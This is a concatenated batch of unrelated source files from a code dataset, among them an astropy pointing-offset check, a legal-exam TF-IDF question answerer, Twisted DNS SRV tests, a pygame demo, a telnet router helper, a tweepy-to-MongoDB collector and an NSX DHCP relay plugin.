            solved_coords = SkyCoord(image.header['CRVAL1'], image.header['CRVAL2'],
                                     unit=(u.deg, u.deg), frame='icrs')

            angular_separation = solved_coords.separation(requested_coords).arcsec
            logs.add_tag(self.logging_tags, 'PNTOFST', angular_separation)

            if abs(angular_separation) > self.SEVERE_THRESHOLD:
                self.logger.error('Pointing offset exceeds threshold', extra=self.logging_tags)
            elif abs(angular_separation) > self.WARNING_THRESHOLD:
                self.logger.warning('Pointing offset exceeds threshold', extra=self.logging_tags)

            image.header['PNTOFST'] = (
                angular_separation, '[arcsec] offset of requested and solved center'
            )

        return images
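
# Sketch of the underlying astropy separation calculation (coordinates made up):
# a = SkyCoord('10h00m00s', '+20d00m00s', frame='icrs')
# b = SkyCoord(150.002, 20.001, unit=(u.deg, u.deg), frame='icrs')
# offset_arcsec = a.separation(b).arcsec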
StarcoderdataPython
3225156
import copy import csv import os import json from functools import reduce import collections from lxml import etree import nltk import numpy import networkx nltk.download('punkt') """ ## examples # parse OAB exam, return generator of OABQuestion instances oab = parse_xml('/home/bruno/git/oab-exams/OAB/raw/2010-01.xml') questions = questions_in_tree(oab) first_q = next(questions) # parse law XML, return tuple (article-ID, list-of-raw-article-text) lei = law_articles_in_file('/home/bruno/git/oab-exams/lexml/lei-8906.xml') leis = all_law_articles_in_path('/home/bruno/git/oab-exams/lexml/') # create an instance of collection of articles, which processes the # text in each article, creates a node for each, creates a graph of # them, and caches their TF-IDF vectors artcol = ArticleCollection(leis, rm_stopwords=True) laws = read_laws_into_artcollection('/home/bruno/git/oab-exams/lexml/', False, True) # see code for arguments # add first question to graph constructed from the articles in artcol # return the shortest path and distance from the question statement # to each item paths_dict = question_paths_in_graph(artcol, first_q) # shallow question answering justified questions in justify.txt, using # laws in lexml/ and getting the questions at OAB/raw/ result = sqa_justified_questions('doc/justify.txt', 'lexml/', 'OAB/raw/', rm_stopwords=True, separate=False) # shallow question answering non-justified questions in an exam paths = sqa_questions_in_exam('/home/bruno/git/oab-exams/OAB/raw/2016-20a.xml', artcol, max_questions=10) # calculate paths and write them to json questions_in_exams_to_json('exams_path', artcol, max_questions=10) """ # ## reading XML def parse_xml(path, parser=etree.XMLParser(remove_blank_text=True)): return etree.parse(path) def elements_in_tree(tree, element_tag): assert isinstance(tree, etree._ElementTree) for element in tree.getiterator(tag=element_tag): yield element # ## reading OAB exams def get_exam_id(tree): exam_id = tree.getroot() return exam_id.get('year')+'-'+exam_id.get('edition') def get_statement_text(question): return question.find('statement').text def get_items(question): return question.find('items').getchildren() def get_correct_item(question): for i in get_items(question): if i.get('correct') == "true": return i.get('letter') def make_items_dict(items): return dict((i.get('letter'), getattr(i, 'text')) for i in items) class OABQuestion(): def __init__(self, number, exam, valid, statement, items, justification=None): self.number = number self.exam = exam self.valid = valid self.statement = statement self.items = items self.justification = justification def str_repr(self): if self.valid and self.justification: return "OAB:{}|Q{}|ans:{}|just:{}".format(self.exam, self.number, self.valid, self.justification) elif self.valid: return "OAB:{}|Q{}|ans:{}|just:{}".format(self.exam, self.number, self.valid, ".") else: return "OAB:{}|Q{}|ans:{}".format(self.exam, self.number, "NULL") def __repr__(self): return self.str_repr() def questions_in_tree(tree): for question in elements_in_tree(tree, 'question'): yield OABQuestion(question.get('number'), get_exam_id(tree), get_correct_item(question), get_statement_text(question), make_items_dict(get_items(question))) # ## reading law XML # lexML namespaces def namespace_it(namespace, key, element): # namespaced element in {namespace}element syntax return "{{{}}}{}".format(namespace[key], element) def lazy_articles_in_tree(tree): for artigo in elements_in_tree(tree, namespace_it(tree.getroot().nsmap, None, 'Artigo')): yield 
artigo.get('id'), ''.join(artigo.itertext()) def articles_in_tree(tree): return list(lazy_articles_in_tree(tree)) def get_urn(law_xml): assert isinstance(law_xml, etree._ElementTree) # fixme http://lxml.de/xpathxslt.html#namespaces-and-prefixes id_element = law_xml.find(namespace_it(law_xml.getroot().nsmap, None, 'Metadado') + '/' + namespace_it(law_xml.getroot().nsmap, None, 'Identificacao')) return id_element.get('URN') def law_articles_in_file(law_path): law_xml = parse_xml(law_path) law_urn = get_urn(law_xml) return (law_urn, articles_in_tree(law_xml)) def all_law_articles_in_path(laws_path): # reads all .xml files in laws_path to a list of law_articles assert os.path.isdir(laws_path) laws = [] for file in os.scandir(laws_path): if file.name.endswith(".xml"): law = law_articles_in_file(file.path) laws.append(law) return laws # ## text processing def is_number(token): try: float(token.replace(',', '.').replace('º', '')) except ValueError: return False return True def is_punctuation(token): if token in '!"#$%&\'()*+,-./:;<=>?@[\\]^_`´{|}~§–': return True def is_stopword(token, language='portuguese'): if token in nltk.corpus.stopwords.words(language): return True def is_useful(token, rm_stopwords): token = token.strip() if is_number(token) or is_punctuation(token) or (rm_stopwords and is_stopword(token)): return False else: return True def preprocess_text(text, rm_stopwords): assert isinstance(rm_stopwords, bool) return [token.lower().strip() for token in nltk.tokenize.word_tokenize(text) if is_useful(token, rm_stopwords)] # ## tf-idf and base graph making def cosine_similarity(vec1, vec2): denominator = numpy.linalg.norm(vec1) * numpy.linalg.norm(vec2) if denominator == 0: return 0 else: return numpy.dot(vec1, vec2) / denominator class ArticleCollection(nltk.TextCollection): # source is [(law-urn [(art-id, raw-art-text)+])+] def __init__(self, source, rm_stopwords=False, text_preprocessing_fn=preprocess_text, similarity_fn=cosine_similarity): assert isinstance(source, list) self.rm_stopwords = rm_stopwords self._text_preprocessing_fn = text_preprocessing_fn self._similarity_fn = similarity_fn # map article id to its index self.ids, self.raw_texts = self.make_ids_and_raw_texts(source) self.laws = [law[0] for law in source] # remove law id # so that we have useful methods such as .idf(token) nltk.TextCollection.__init__(self, list(map(lambda x: text_preprocessing_fn(x, self.rm_stopwords), self.raw_texts))) # index tokens to create TF-IDF vector self.token_index_dict = {key:ix for ix, key in enumerate(self.vocab().keys())} self.vocab_size = len(self.vocab().keys()) self.tfidf_vectors = [self.tfidf_vectorize(text) for text in self._texts] self.size = len(self._texts) # graph w/ only the articles as nodes, no edges self.base_graph = self.make_base_graph() def __repr__(self): return "ArticleCollection: {}".format(self.laws) def make_ids_and_raw_texts(self, source): ids = {} raw_texts = [] ix = 0 for law in source: law_id = law[0] for article in law[1]: art_id = article[0] art_id = law_id + art_id ids[art_id] = ix raw_texts.append(article[1]) ix += 1 return ids, raw_texts def tf_tokens(self, tokens): count = collections.Counter(tokens) length = len(tokens) return list(map(lambda x: count[x]/length, tokens)) def tfidf_vectorize(self, text): # text must be preprocessed first! 
tfidf_vector = numpy.zeros(self.vocab_size) tf_vector = self.tf_tokens(text) for ix, token in enumerate(text): idf = self.idf(token) if idf == 0: continue tfidf_vector[self.token_index_dict[token]] = tf_vector[ix] * idf return tfidf_vector def inverse_similarity(self, vec1, vec2): similarity = self._similarity_fn(vec1, vec2) if similarity == 0: return numpy.Infinity else: return 1 / similarity def make_base_graph(self): graph = networkx.DiGraph() graph.add_nodes_from(self.ids.keys()) return graph # ## add questions def add_temporary_node(graph, artcol, text, label, to_nodes=True): """ article_collection is where graph and tfidf-calculation happen, text is raw question statement (which is preprocessed here) and label is question number in str. to_nodes is the direction of the edges to be built. should be from new node to the nodes already present, or from them to the node being added? """ graph.add_node(label) label_tfidf = artcol.tfidf_vectorize(artcol._text_preprocessing_fn(text, artcol.rm_stopwords)) # to add edges only to the articles, and not every node for node_id in artcol.ids.keys(): node_ix = artcol.ids[node_id] if to_nodes: graph.add_edge(label, node_id, weight=artcol.inverse_similarity(label_tfidf, artcol.tfidf_vectors[node_ix])) else: graph.add_edge(node_id, label, weight=artcol.inverse_similarity(label_tfidf, artcol.tfidf_vectors[node_ix])) return graph def question_paths_in_graph(article_collection, oab_question): """ return distance and shortest path from statement to each item in oab_question. note that '1' (str) means question one. """ assert isinstance(article_collection, ArticleCollection) assert isinstance(oab_question, OABQuestion) # so that base_graph is not changed improperly: graph = copy.deepcopy(article_collection.base_graph) # add question statement: graph = add_temporary_node(graph, article_collection, oab_question.statement, oab_question.number, to_nodes=True) paths = {} for question_letter, item_text in oab_question.items.items(): graph = add_temporary_node(graph, article_collection, item_text, question_letter, to_nodes=False) paths[question_letter] = networkx.algorithms.shortest_paths.bidirectional_dijkstra(graph, oab_question.number, question_letter, weight='weight') return paths # ## add justified questions def read_laws_into_separate_artcol(laws_path, rm_stopwords): laws = {} for file in os.scandir(laws_path): if file.name.endswith(".xml"): urn, artigos = law_articles_in_file(file.path) artcol = ArticleCollection([(urn, artigos)], rm_stopwords) laws[urn] = artcol return laws def read_laws_into_artcollection(laws_path, separate, rm_stopwords=False): # reads all .xml files in laws_path to a dictionary of urn:artcol assert os.path.isdir(laws_path) if separate: laws = read_laws_into_separate_artcol(laws_path, rm_stopwords) else: laws_list = all_law_articles_in_path(laws_path) laws = ArticleCollection(laws_list, rm_stopwords) return laws def get_law_artcol(laws, urn, separate): if separate: return laws[urn] else: return laws def find_question(oab_exam, question_nr): assert isinstance(oab_exam, etree._ElementTree) for question in questions_in_tree(oab_exam): if question.number == question_nr: return question def sqa_justified_questions(justification_path, laws_path, exams_path, rm_stopwords=False, separate=True): # sqa = shallow question answering # justification file must be in the format described in docs. 
assert os.path.isfile(justification_path) assert os.path.isdir(exams_path) laws = read_laws_into_artcollection(laws_path, separate, rm_stopwords) question_paths = {} with open(justification_path, 'r') as tsv: tsv = csv.reader(tsv, delimiter='\t') for row in tsv: # row[0]: OAB exam filename exam_path = os.path.join(exams_path, row[0] + '.xml') oab_exam = parse_xml(exam_path) # row[1]: question number question = find_question(oab_exam, row[1]) # row[3]: justification law URN artcol = get_law_artcol(laws, row[3], separate) # row[2]: justification article question.justification = (row[3], row[2]) paths = question_paths_in_graph(artcol, question) question_paths[question] = paths return question_paths def get_minimum_paths(question_paths): minimum_paths = {} for question, item_paths in question_paths.items(): paths = [] for item, item_path in item_paths.items(): paths.append(item_path) minimum_path = reduce(lambda x,y: y if x[0]>y[0] else x if x[0] < y[0] else x + ("can't decide between {} and {}".format(x[1],y[1]),), paths) minimum_paths[question] = minimum_path return minimum_paths def get_correct_item_paths(question_paths): correct_paths = {} for question, item_paths in question_paths.items(): if not question.valid: continue correct_letter = question.valid correct_item_path = item_paths[correct_letter] correct_paths[question] = correct_item_path return correct_paths def check_justification_correct_items(question_paths): # return True if justification for the correct article match with # the correct justification correct_items = {} for question, item_paths in question_paths.items(): correct_letter = question.valid correct_item_path = item_paths[correct_letter] selected_article = correct_item_path[1][1] justification_urn = question.justification[0] justification_articles = question.justification[1].split(',') justification = list(map(lambda x: justification_urn + x, justification_articles)) correct_items[question] = (selected_article in justification) return correct_items # ## assign article to question def sqa_questions_in_exam(exam_path, artcol, max_questions=-1): assert os.path.isfile(exam_path) exam = parse_xml(exam_path) question_paths = {} for ix, question in enumerate(questions_in_tree(exam)): if ix == max_questions: break paths = question_paths_in_graph(artcol, question) question_paths[question] = paths return question_paths def make_paths_printable(question_paths): printable_paths = {} for question, item_paths in question_paths.items(): question_str = question.str_repr() printable_paths[question_str] = item_paths return printable_paths def to_json(dictionary, path): with open(path, 'w') as f: json.dump(dictionary, f, indent=4) def questions_in_exams_to_json(exams_path, artcol, max_questions=-1): # make this work with all functions later assert os.path.isdir(exams_path) paths = {} for file in os.scandir(exams_path): if file.name.endswith(".xml"): exam_question_paths = sqa_questions_in_exam(file.path, artcol, max_questions=max_questions) paths[file.name] = make_paths_printable(exam_question_paths) result_path = os.path.join(os.path.dirname(file.path), 'results.json') to_json(paths, result_path)
StarcoderdataPython
3209671
from .tictactoe import main main()
StarcoderdataPython
138255
# Generated by Django 2.2.24 on 2022-01-23 01:09 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ("petition", "0041_merge_20211212_2109"), ] operations = [ migrations.AddField( model_name="generatedpetition", name="age", field=models.PositiveIntegerField(null=True), ), migrations.AddField( model_name="generatedpetition", name="county", field=models.CharField(blank=True, max_length=256, null=True), ), migrations.AddField( model_name="generatedpetition", name="jurisdiction", field=models.CharField( choices=[ ("D", "DISTRICT COURT"), ("S", "SUPERIOR COURT"), ("N/A", "NOT AVAILABLE"), ], max_length=255, null=True, ), ), migrations.AddField( model_name="generatedpetition", name="race", field=models.CharField(max_length=256, null=True), ), migrations.AddField( model_name="generatedpetition", name="sex", field=models.CharField( choices=[ ("M", "Male"), ("F", "Female"), ("U", "Unknown"), ("N/A", "NOT AVAILABLE"), ], default="N/A", max_length=6, null=True, ), ), migrations.AlterField( model_name="petition", name="county", field=models.CharField(blank=True, max_length=256), ), ]
StarcoderdataPython
1611995
<gh_stars>1-10
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.

"""
Test cases for L{twisted.names.srvconnect}.
"""

from twisted.internet import defer, protocol
from twisted.names import client, dns, srvconnect
from twisted.names.common import ResolverBase
from twisted.names.error import DNSNameError
from twisted.internet.error import DNSLookupError, ServiceNameUnknownError
from twisted.trial import unittest
from twisted.test.proto_helpers import MemoryReactor


class FakeResolver(ResolverBase):
    """
    Resolver that only gives out one given result.

    Either L{results} or L{failure} must be set and will be used for
    the return value of L{_lookup}.

    @ivar results: List of L{dns.RRHeader} for the desired result.
    @type results: C{list}

    @ivar failure: Failure with an exception from L{twisted.names.error}.
    @type failure: L{Failure<twisted.python.failure.Failure>}
    """

    def __init__(self, results=None, failure=None):
        self.results = results
        self.failure = failure

    def _lookup(self, name, cls, qtype, timeout):
        """
        Return the result or failure on lookup.
        """
        if self.results is not None:
            return defer.succeed((self.results, [], []))
        else:
            return defer.fail(self.failure)


class DummyFactory(protocol.ClientFactory):
    """
    Dummy client factory that stores the reason of connection failure.
    """

    def __init__(self):
        self.reason = None

    def clientConnectionFailed(self, connector, reason):
        self.reason = reason


class SRVConnectorTest(unittest.TestCase):
    """
    Tests for L{srvconnect.SRVConnector}.
    """

    def setUp(self):
        self.patch(client, 'theResolver', FakeResolver())
        self.reactor = MemoryReactor()
        self.factory = DummyFactory()
        self.connector = srvconnect.SRVConnector(self.reactor, 'xmpp-server',
                                                 'example.org', self.factory)

    def test_SRVPresent(self):
        """
        Test connectTCP gets called with the address from the SRV record.
        """
        payload = dns.Record_SRV(port=6269, target='host.example.org', ttl=60)
        client.theResolver.results = [dns.RRHeader(name='example.org',
                                                   type=dns.SRV, cls=dns.IN,
                                                   ttl=60, payload=payload)]
        self.connector.connect()

        self.assertIdentical(None, self.factory.reason)
        self.assertEqual(
            self.reactor.tcpClients.pop()[:2], ('host.example.org', 6269))

    def test_SRVNotPresent(self):
        """
        Test connectTCP gets called with fallback parameters on NXDOMAIN.
        """
        client.theResolver.failure = DNSNameError('example.org')
        self.connector.connect()

        self.assertIdentical(None, self.factory.reason)
        self.assertEqual(
            self.reactor.tcpClients.pop()[:2], ('example.org', 'xmpp-server'))

    def test_SRVNoResult(self):
        """
        Test connectTCP gets called with fallback parameters on empty result.
        """
        client.theResolver.results = []
        self.connector.connect()

        self.assertIdentical(None, self.factory.reason)
        self.assertEqual(
            self.reactor.tcpClients.pop()[:2], ('example.org', 'xmpp-server'))

    def test_SRVNoResultUnknownServiceDefaultPort(self):
        """
        connectTCP gets called with default port if the service is not defined.
        """
        self.connector = srvconnect.SRVConnector(self.reactor,
                                                 'thisbetternotexist',
                                                 'example.org', self.factory,
                                                 defaultPort=5222)

        client.theResolver.failure = ServiceNameUnknownError()
        self.connector.connect()

        self.assertIdentical(None, self.factory.reason)
        self.assertEqual(
            self.reactor.tcpClients.pop()[:2], ('example.org', 5222))

    def test_SRVNoResultUnknownServiceNoDefaultPort(self):
        """
        Connect fails on no result, unknown service and no default port.
        """
        self.connector = srvconnect.SRVConnector(self.reactor,
                                                 'thisbetternotexist',
                                                 'example.org', self.factory)

        client.theResolver.failure = ServiceNameUnknownError()
        self.connector.connect()

        self.assertTrue(self.factory.reason.check(ServiceNameUnknownError))

    def test_SRVBadResult(self):
        """
        Test connectTCP gets called with fallback parameters on bad result.
        """
        client.theResolver.results = [dns.RRHeader(name='example.org',
                                                   type=dns.CNAME, cls=dns.IN,
                                                   ttl=60, payload=None)]
        self.connector.connect()

        self.assertIdentical(None, self.factory.reason)
        self.assertEqual(
            self.reactor.tcpClients.pop()[:2], ('example.org', 'xmpp-server'))

    def test_SRVNoService(self):
        """
        Test that connecting fails when no service is present.
        """
        payload = dns.Record_SRV(port=5269, target='.', ttl=60)
        client.theResolver.results = [dns.RRHeader(name='example.org',
                                                   type=dns.SRV, cls=dns.IN,
                                                   ttl=60, payload=payload)]
        self.connector.connect()

        self.assertNotIdentical(None, self.factory.reason)
        self.factory.reason.trap(DNSLookupError)
        self.assertEqual(self.reactor.tcpClients, [])

    def test_unicodeDomain(self):
        """
        L{srvconnect.SRVConnector} automatically encodes unicode domain using
        C{idna} encoding.
        """
        self.connector = srvconnect.SRVConnector(
            self.reactor, 'xmpp-client', u'\u00e9chec.example.org',
            self.factory)
        self.assertIsInstance(self.connector.domain, bytes)
        self.assertEqual(b'xn--chec-9oa.example.org', self.connector.domain)
StarcoderdataPython
57142
"""" Parte 5: Criando Colisões """ #Importações necessárias para a criação da janela import pygame from pygame.locals import * from sys import exit from random import randint #Inicialização das váriaveis e funções do pygame pygame.init() #Criação da tela width = 640 height = 480 x = width/2 y = height/2 #Criando váriaveis para assumir diferentes valores para cada colisão x_blue = randint(40, 600) y_blue = randint(50, 430) screen = pygame.display.set_mode((width, height)) pygame.display.set_caption('Game') #Controlando a velocidade da movimentação do objeto clock = pygame.time.Clock() #Looping principal do jogo while True: clock.tick(30) screen.fill((0, 0, 0)) for event in pygame.event.get(): if event.type == QUIT: pygame.quit() exit() #Criando uma condição para mudar a movimentação de acordo com a tecla if event.type == KEYDOWN: if event.key == K_a: x = x - 20 if event.key == K_d: x = x + 20 if event.key == K_w: y = y - 20 if event.key == K_s: y = y + 20 #Criando uma condição caso a tecla continue a ser pressionada if pygame.key.get_pressed()[K_a]: x = x - 20 if pygame.key.get_pressed()[K_d]: x = x + 20 if pygame.key.get_pressed()[K_w]: y = y - 20 if pygame.key.get_pressed()[K_s]: y = y + 20 #Desenhando Objetos dentro da Tela e movimentando ret_red = pygame.draw.rect(screen, (255, 0, 0), (x, y, 40, 50))# ret_blue = pygame.draw.rect(screen, (0, 0, 255), (x_blue, y_blue, 40, 50)) #Criando Condições para cada colisão if ret_red.colliderect(ret_blue): x_blue = randint(40, 600) y_blue = randint(50, 430) pygame.display.update()
StarcoderdataPython
13547
import telnetlib
import time


def send_command_telnetlib(ipaddress, username, password, enable_pass, command):
    # Connect to the device passed in (the original hard-coded an address
    # here and ignored the ipaddress argument)
    t = telnetlib.Telnet(ipaddress)
    t.read_until(b"Username:")
    t.write(username.encode("ascii") + b"\n")
    t.read_until(b"Password:")
    t.write(password.encode("ascii") + b"\n")
    t.write(b"enable\n")
    t.read_until(b"Password:")
    t.write(enable_pass.encode("ascii") + b"\n")
    t.read_until(b"#")
    t.write(b"terminal length 0\n")
    # command must be bytes, since it is concatenated with b"\n"
    t.write(command + b"\n")
    time.sleep(1)
    result = t.read_until(b"#").decode("utf-8")
    return result
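
# Hedged usage sketch (not from the original file): the address is the one the
# original hard-coded, the credentials are placeholders, and the command is
# passed as bytes because the function appends b"\n" to it.
if __name__ == "__main__":
    output = send_command_telnetlib(
        "192.168.100.1", "cisco", "cisco", "cisco", b"show ip int br"
    )
    print(output)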
StarcoderdataPython
3322904
<gh_stars>10-100
#!/usr/bin/env python3

# TBD

type Config struct {
	XXX map[string]interface{} `yaml:",inline"`
}

// avoid recursion in UnmarshalYAML
type configAlias Config

func (c *Config) UnmarshalYAML(unmarshal func(interface{}) error) error {
	a := (*configAlias)(c)
	if err := unmarshal(a); err != nil {
		return err
	}
	if len(c.XXX) != 0 {
		return errors.Errorf("undefined fields %v", c.XXX)
	}
	return nil
}

func (c *Config) Apply() error {
	if err := c.Validate(); err != nil {
		return err
	}
	return nil
}

func (c *Config) Validate() error {
	return nil
}
StarcoderdataPython
51699
import math
import copy
from functools import reduce


def matches(line, rules, rule):
    # this is the base case
    if "\"" in rule:
        if len(line) > 0 and line[0] == rule[1]:
            return [1]
        else:
            return []

    # rule = ['1', '2']
    rule = rule.split(" ")

    # this stores the possible offsets from line[0:] that match
    offsets = []
    for i in range(len(rule)):
        r = rule[i]
        r = rules[r]

        # first iteration, offsets is empty
        if i == 0:
            for s in r:
                for m in matches(line, rules, s):
                    if m not in offsets:
                        offsets.append(m)
            continue

        new_offsets = []
        for s in r:
            for o in offsets:
                for m in matches(line[o:], rules, s):
                    new_offsets.append(o + m)
        offsets = new_offsets

    return offsets


with open("input.txt", "r") as file:
    rules, messages = file.read().split("\n\n")

# { '1': ['2 3', '3 2'] }
rules = {
    k: v.split(" | ")
    for k, v in [r.split(": ") for r in rules.split("\n")]
}

rules['8'] = ['42', '42 8']
rules['11'] = ['42 31', '42 11 31']

#print("result:", matches(messages.split("\n")[0], rules, '1'))
print("solution =", sum([len(m) in matches(m, rules, '0') for m in messages.split("\n")]))
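
# Hedged worked example (tiny grammar, not part of the puzzle input): with the
# rules below, matches("ab", ..., '0') returns [2] because rule 0 consumes
# exactly the whole two-character message, so `len("ab") in matches(...)` is
# True and "ab" counts as valid; "ba" fails at the first symbol.
demo_rules = {'0': ['1 2'], '1': ['"a"'], '2': ['"b"']}
assert matches("ab", demo_rules, '0') == [2]
assert matches("ba", demo_rules, '0') == []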
StarcoderdataPython
1686540
import ctypes as c
import struct
from typing import List

from . import constants as const
from .fields.data_types import XmpEmpty
from . import utils
from .struct_header import ProtocolHeader


class Request:
    def __init__(
        self,
        class_name: str,
        indices: List[int],
        cmd_type: int,
        cmd_code: int,
        module_index: int = const.NOTHING,
        port_index: int = const.NOTHING,
        values: object = None,
    ) -> None:
        self.class_name = class_name
        self.header = ProtocolHeader(
            magic_word=const.MAGIC_WORD,
            number_of_indices=len(indices),
            number_of_value_bytes=self._get_values_length(values),
            cmd_code=cmd_code,
            cmd_type=cmd_type,
            module_index=module_index,
            port_index=port_index,
            request_identifier=0,
        )
        self.index_values = indices
        self.values = values
        self.padding = (
            4 - (self.header.number_of_value_bytes % 4)
            if self.header.number_of_value_bytes % 4
            else 0
        )

    def __str__(self) -> str:
        return utils.format_str(
            self,
            f"padding : {self.padding}",
        )

    def __repr__(self) -> str:
        return utils.format_repr(self)

    def __bytes__(self) -> bytes:
        cmd_all = b"".join(
            (
                bytes(self.header),  # type: ignore
                struct.pack(f"!{self.header.number_of_indices}I", *self.index_values),
                self._get_values_bytes(self.values),
                bytes(self.padding),
            )
        )
        return cmd_all

    @staticmethod
    def _get_values_length(values: object) -> int:
        if values is None or not hasattr(values, "__annotations__"):
            return 0
        return sum(
            getattr(values, k, XmpEmpty()).byte_length()
            for k in values.__annotations__.keys()
        )

    @staticmethod
    def _get_values_bytes(values: object) -> bytes:
        if values is None or not hasattr(values, "__annotations__"):
            return b""
        return b"".join(
            bytes(getattr(values, k)) for k in values.__annotations__.keys()
        )
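
# Hedged illustration (standalone, no package imports needed): the padding
# expression in __init__ rounds the value payload up to the next 4-byte
# boundary, so the serialized request stays word-aligned on the wire.
def _pad_len(number_of_value_bytes: int) -> int:
    n = number_of_value_bytes
    return 4 - (n % 4) if n % 4 else 0

assert [_pad_len(n) for n in range(6)] == [0, 3, 2, 1, 0, 3]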
StarcoderdataPython
127218
<gh_stars>1-10
# -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2017-12-22 17:56
from __future__ import unicode_literals

from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
        ('goods', '0030_auto_20171222_1557'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='transactionmetrix',
            name='rfid_minus_upc',
        ),
        migrations.AddField(
            model_name='transactionmetrix',
            name='only_image_upc_num',
            field=models.PositiveIntegerField(default=0),
        ),
        migrations.AddField(
            model_name='transactionmetrix',
            name='only_rfid_upc_num',
            field=models.PositiveIntegerField(default=0),
        ),
    ]
StarcoderdataPython
82401
<gh_stars>0
"""The following script is meant for use with the Twitter API v2.
The minimum tweepy version to use is 4.0.1."""

import tweepy
from credentials import *
import logging
import pymongo

# create a connection to the mongodb running in the mongo container of the pipeline
mongo_client = pymongo.MongoClient("mongodb")

# create a new database called twitter
db = mongo_client.twitter

# create collection
collection = db.tweets

##### AUTHENTICATION #####
twitter_client = tweepy.Client(
    bearer_token=BEARER_TOKEN,
    consumer_key=API_KEY,
    consumer_secret=API_KEY_SECRET,
    access_token=ACCESS_TOKEN,
    access_token_secret=ACCESS_TOKEN_SECRET,
)

if twitter_client:
    logging.critical("\nAuthentication OK")
else:
    logging.critical('\nVerify your credentials')

##### SEARCHING FOR TWEETS #####
# Defining a query search string
query = 'pollution lang:en -is:retweet'

search_tweets = twitter_client.search_recent_tweets(
    query=query, tweet_fields=['id', 'created_at', 'text'], max_results=100
)

for tweet in search_tweets.data:
    logging.critical(f'\n\n\nINCOMING TWEET:\n{tweet.text}\n\n\n')
    # build a json record and insert it into the collection called tweets
    record = {'text': tweet.text, 'id': tweet.id, 'created_at': tweet.created_at}
    collection.insert_one(record)
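
# Hedged extension (not in the original script): search_recent_tweets caps a
# single call at 100 results, so fetching more requires pagination. tweepy 4.x
# provides tweepy.Paginator for this; the 500-tweet limit below is an
# arbitrary example value.
for tweet in tweepy.Paginator(
    twitter_client.search_recent_tweets,
    query=query,
    tweet_fields=['id', 'created_at', 'text'],
    max_results=100,
).flatten(limit=500):
    collection.insert_one(
        {'text': tweet.text, 'id': tweet.id, 'created_at': tweet.created_at}
    )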
StarcoderdataPython
1797848
from typing import List


class Solution:
    def maxChunksToSorted(self, arr: List[int]) -> int:
        maxNum = count = 0
        for i, a in enumerate(arr):
            maxNum = max(maxNum, a)
            if maxNum == i:
                count += 1
        return count
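
# Hedged worked example (assumes arr is a permutation of 0..n-1, the premise
# of the problem): a chunk can end at index i exactly when the largest value
# seen so far equals i, because then indices 0..i hold exactly the values 0..i.
assert Solution().maxChunksToSorted([4, 3, 2, 1, 0]) == 1
assert Solution().maxChunksToSorted([1, 0, 2, 3, 4]) == 4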
StarcoderdataPython
3315000
########
# Copyright (c) 2016 GigaSpaces Technologies Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#        http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

from cloudify import ctx
from cloudify.decorators import operation
import cloudify_nsx.library.nsx_esg_dlr as cfy_dlr
import cloudify_nsx.library.nsx_common as common


@operation
def create(**kwargs):
    validation_rules = {
        "dlr_id": {
            "required": True
        },
        "relayServer": {
            "default": {}
        },
        "relayAgents": {
            "default": {}
        }
    }

    use_existing, relay_dict = common.get_properties_and_validate(
        'relay', kwargs, validation_rules
    )

    resource_id = ctx.instance.runtime_properties.get('resource_id')
    if resource_id:
        ctx.logger.info("Reused %s" % resource_id)
        return

    # credentials
    client_session = common.nsx_login(kwargs)

    cfy_dlr.update_dhcp_relay(
        client_session,
        relay_dict['dlr_id'],
        relay_dict['relayServer'],
        relay_dict['relayAgents']
    )

    resource_id = relay_dict['dlr_id']
    ctx.instance.runtime_properties['resource_id'] = resource_id
    ctx.logger.info("created %s" % resource_id)


@operation
def delete(**kwargs):
    common.delete_object(cfy_dlr.del_dhcp_relay, 'relay', kwargs)
StarcoderdataPython
3388332
<reponame>chyroc/pylark # Code generated by lark_sdk_gen. DO NOT EDIT. """Feishu/Lark Open API Python Sdk, Support ALL Open API and Event Callback.""" from pylark.api_service_acs import LarkACSService from pylark.api_service_acs_access_record_list import ( GetACSAccessRecordListReq, GetACSAccessRecordListRespItem, GetACSAccessRecordListResp, ) from pylark.api_service_acs_access_record_photo_get import ( GetACSAccessRecordPhotoReq, GetACSAccessRecordPhotoResp, GetACSAccessRecordPhotoResp, ) from pylark.api_service_acs_device_list import ( GetACSDeviceListReq, GetACSDeviceListRespItem, GetACSDeviceListResp, ) from pylark.api_service_acs_user_face_get import ( GetACSUserFaceReq, GetACSUserFaceResp, GetACSUserFaceResp, ) from pylark.api_service_acs_user_face_update import ( UpdateACSUserFaceReq, UpdateACSUserFaceResp, ) from pylark.api_service_acs_user_get import ( GetACSUserReq, GetACSUserRespUserFeature, GetACSUserRespUser, GetACSUserResp, ) from pylark.api_service_acs_user_list import ( GetACSUserListReq, GetACSUserListRespItemFeature, GetACSUserListRespItem, GetACSUserListResp, ) from pylark.api_service_acs_user_update import ( UpdateACSUserReqFeature, UpdateACSUserReq, UpdateACSUserResp, ) from pylark.api_service_admin import LarkAdminService from pylark.api_service_admin_admin_dept_stats_get import ( GetAdminDeptStatsReq, GetAdminDeptStatsRespItem, GetAdminDeptStatsResp, ) from pylark.api_service_admin_admin_user_stats_get import ( GetAdminUserStatsReq, GetAdminUserStatsRespItem, GetAdminUserStatsResp, ) from pylark.api_service_ai import LarkAIService from pylark.api_service_ai_detect_face_attributes import ( DetectFaceAttributesReq, DetectFaceAttributesRespFaceInfoQualityOcclude, DetectFaceAttributesRespFaceInfoQuality, DetectFaceAttributesRespFaceInfoAttributeMask, DetectFaceAttributesRespFaceInfoAttributeGlass, DetectFaceAttributesRespFaceInfoAttributeHat, DetectFaceAttributesRespFaceInfoAttributePose, DetectFaceAttributesRespFaceInfoAttributeEmotion, DetectFaceAttributesRespFaceInfoAttributeGender, DetectFaceAttributesRespFaceInfoAttribute, DetectFaceAttributesRespFaceInfoPositionLowerRight, DetectFaceAttributesRespFaceInfoPositionUpperLeft, DetectFaceAttributesRespFaceInfoPosition, DetectFaceAttributesRespFaceInfo, DetectFaceAttributesRespImageInfo, DetectFaceAttributesResp, ) from pylark.api_service_ai_detect_text_language import ( DetectTextLanguageReq, DetectTextLanguageResp, ) from 